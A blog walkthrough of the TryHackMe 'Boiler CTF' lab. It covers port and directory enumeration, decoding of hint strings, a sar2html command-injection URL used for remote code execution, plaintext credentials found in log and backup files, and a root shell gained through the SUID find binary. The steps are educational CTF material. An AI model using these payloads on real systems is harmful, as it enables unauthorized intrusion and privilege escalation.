Boiler CTF TryHackMe

Ashutosh Gupta
9 min readAug 16, 2020

--

Hello folks! I am Ashutosh Gupta a.k.a “m3ta_c1ph4r” . I am doing Tryhackme from the last two months . I can say that this is the best place for the beginners and intermediate. There are many rooms in that you can practise and polish your skills. There are rooms on every topic labeling from easy to hard and step by step exploitation of machine. This is my first writeup of Tryhackme on medium. So lets begin the fun!

Link for the room https://tryhackme.com/room/boilerctf2

So firstly you have to join the room then deploy it.

TASK 1 : ENUMERATION

  • NMAP:

As many of you know firstly we do is nmap. So the command is

$ nmap -sC -sV 10.10.32.78  -oN nmapStarting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 16:55 IST
Nmap scan report for 10.10.32.78
Host is up (0.32s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.82.50
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open http MiniServ 1.930 (Webmin httpd)
|_http-server-header: MiniServ/1.930
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.56 seconds

sC is used for script scan i.e to search the scripts

sV is used for versions scan to determine service/version info

Here you see there are three open ports. As you can see in FTP anonymous login is allowed . So lets check if we find anything in this.

$ ftp 10.10.32.78

Using this command we will log into then it will ask for name , give it anonymous . Then you will be login to the FTP.

Then we will check the files and directories present using ls command. As you will type you see there is no files and directories present. So lets check hidden one. We will do this using ls -la command.

  • l -means to give the output in list format
  • a -means to show all the files including chown and hidden one.

As when you will type this you will see a hidden file name info.txt. Then if you think open that file then you can’t because ftp is file transfer protocol. So you can download it using command get .info.txt.

Then type exit. And you see you have that file in you pc.

And here you get the first answer of Task 1.

Task 1–1:

txt

Task 1–2:

nmap -p- <machine ip>

Here you got the highest port 55007. And there you say ssh is running.

Task 1–3:

In the nmap you see 
10000/tcp open http MiniServ 1.930 (Webmin httpd)
webmin is running

Task 1–4:

Google the exploit of webmin. On checking it, you will find their in no exploit available for that version of service. The service is up to date.

Lets come back to the file we got from ftp

$ cat .info.txt
Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!

As you will what is this. So let me clear you that this is encoded text. This is ROT13. It is substitution cipher that replaces a letter with the 13th letter after it. Lets decode it . I used this website to decode it.

There you get this after decoding this.

Just wanted to see if you find it. Lol. Remember: Enumeration is the key!

It just says that enumeration is the key which means we have to do more enumeration.

  • Gobuster

lets do directory fuzzing. For this I used gobutser.

gobuster dir -u http://10.10.32.78/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,xml  -t 100   2>\dev\null===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.32.78/
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,xml,php,html
[+] Timeout: 10s
===============================================================
2020/08/16 17:51:00 Starting gobuster
===============================================================
/index.html (Status: 200)
/manual (Status: 301)
/robots.txt (Status: 200)
/joomla (Status: 301)

dir -means directory fuzzing

u -is used for giving the url or target.

w -is used for giving the wordlist path.

x -is used to search the files having those extensions

t -is used for giving threads to increase the speed of scan

Lets check what we got in the robots.txt

User-agent: *
Disallow: /

/tmp
/.ssh
/yellow
/not
/a+rabbit
/hole
/or
/is
/it

079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075

If you open all the directories you get not found because these all ae rabit holes. So lets see what is these numbers are. Lets decode it.

Firstly we will do use ASCII to TEXT using this link. http://www.unit-conversion.info/texttools/ascii/#data

We got this after decoding

OTliMDY2MGNkOTVhZGVhMzI3YzU0MTgyYmFhNTE1ODQK

Then use use cyberchef to decode it from text to base64.

After decoding we got hash.

99b0660cd95adea327c54182baa51584

Then I used crackstation to crack this. https://crackstation.net/

After decoding I got that this md5 hash. So the decoded text is

kidding

So here it might be the password. But of what we don’t know.

So see other thing we got in gobuster. We have two directories name joomla and mannual. Lets check what is joomla in the google.

Task 1–5:

So as you google joomla you got that joomla is CMS.
So your answer for this is "joomla"

Lets enumrate more. As joomla is a sub-directory so we can do sub directory fuzzing.

gobuster dir -u http://<ip>/joomla  -w /usr/share/dirb/wordlists/common.txt -t 50[+] Url:            http://10.10.2.36/joomla
[+] Threads: 50
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/16 20:43:44 Starting gobuster
===============================================================
/_files (Status: 301)
/_test (Status: 301)
/~www (Status: 301)
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/administrator (Status: 301)
/_archive (Status: 301)
/_database (Status: 301)
/bin (Status: 301)
/build (Status: 301)
/cache (Status: 301)
/components (Status: 301)
/images (Status: 301)
/includes (Status: 301)
/installation (Status: 301)
/language (Status: 301)
/layouts (Status: 301)
/libraries (Status: 301)
/media (Status: 301)
/modules (Status: 301)
/plugins (Status: 301)
/index.php (Status: 200)
/templates (Status: 301)
/tests (Status: 301)
/tmp (Status: 301)
==================================================================

As there quite many directories so after analyzing all the directories I find one directory name “/_test”.

On the left you see “sar2html”. So I search this on google. And there I found a exploit on exploit-db. https://www.exploit-db.com/exploits/47204

In this exploit you can do Remote code execution(RCE).

http://<ipaddr>/index.php?plot=;<command-here> will execute
http://10.10.2.36/joomla/_test/index.php?plot=;whoami
When you click on select host you see in the last item you see the name of the user i.e www-data.

Then I thought to see which files are on the server. So I do ls command.

Task 1–6:

Here we find four but the different one log.txt.
So the answer is log.txt

So I open that using cat log.txt.

So in the sixth option you see there is a username and password.

Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$

So the username : basterd and password : superduperp@$$

Now we can do ssh as we know the username and password and host.

And Boom! you got the shell.

Task 2: POST Enumeration

TASK 2–1 :

As you have the shell lets check the files and directories. There you find one file name backup.sh.

lets check what is in the backup.sh

$ cat backup.sh
REMOTE=1.2.3.4
SOURCE=/home/stoner
TARGET=/usr/local/backup
LOG=/home/stoner/bck.log

DATE=`date +%y\.%m\.%d\.`
USER=stoner
#superduperp@$$no1knows
ssh $USER@$REMOTE mkdir $TARGET/$DATEif [ -d "$SOURCE" ]; then
for i in `ls $SOURCE | grep 'data'`;do
echo "Begining copy of" $i >> $LOG
scp $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
echo $i "completed" >> $LOG
if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
rm $SOURCE/$i
echo $i "removed" >> $LOG
echo "####################" >> $LOG
else
echo "Copy not complete" >> $LOG
exit 0
fi
done
elseecho "Directory is not present" >> $LOG
exit 0
fi

So if you see there you find another user and password.

USER=stoner
superduperp@$$no1knows

So the answer for the task 2–1is backup because it doesn’t ask for the extension and the question ask where the another user and password is stored.

answer is: backup

Lets login with stoner using ssh.

Task 2–2:

Lets find the user flag. As mostly user flag is in home/<username>

So lets go there. cd /home/stoner

And do ls -la to check what files and directories we are having.

stoner@Vulnerable:~$ ls -la
total 20
drwxr-x--- 4 stoner stoner 4096 Aug 16 19:13 .
drwxr-xr-x 4 root root 4096 Aug 22 2019 ..
drwx------ 2 stoner stoner 4096 Aug 16 19:13 .cache
drwxrwxr-x 2 stoner stoner 4096 Aug 22 2019 .nano
-rw-r--r-- 1 stoner stoner 34 Aug 21 2019 .secret

Here we got one hidden file lets see what is this.

stoner@Vulnerable:~$ cat .secret 
You made it till here, well done.

So the user flag is

You made it till here, well done.

Task 2 Privilege Escalation:

So we are in the end of our session. So lets do.

In the privilege escalation my methodology is to check the SUID.

find / -perm -u=s 2>/dev/null

/ -is the llocation that is to check in all the file system

perm -is for the permission that is having root access.

u=s -is to check which user here s is root

2>/dev/null -is for the error i.e it will not show the errors it will send all the errors to /dev/null which is blackhole in the linux.

So lets see the output

/bin/su
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping6
/bin/ping
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/apache2/suexec-custom
/usr/lib/apache2/suexec-pristine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/find
/usr/bin/at
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/newuidmap

So these are the binaries we can run under root. So for finding the exploit there is a best I would say name GTFOBins. https://gtfobins.github.io/

So you can search all this on gtfobins and if you found SUID tag there then it is vulnerable.

Task 2–3:

As I have searched randomly and I found one name find. So lets try this.

So the answer for this is - find

But if you copy the this command sudo sh -c 'cp $(which find) .; chmod +s ./find' you get error.

So because of this you can’t run the second one. As if you see in the last one it is opening a ./find file but we haven’t made this. But we can try without ./ as we find command exist.

find . -exec /bin/sh -p \; -quit

So lets copy this and paste it . And crossed finger if it works or not.

And boom! we got the root :)

Task 2–4:

So we can take root flag.

# cd /root              
# ls
root.txt
# cat root.txt
It wasn't that hard, was it?

So the root flag is :

It wasn't that hard, was it?

I hope you enjoyed this and learned something. It was a fun CTF with lot f trolling.

So see you again!

Linkedin profile : www.linkedin.com/in/ashutosh-gupta-152142193

Instagram profile for the updates : https://www.instagram.com/gupta_ashuu/

--

--

No responses yet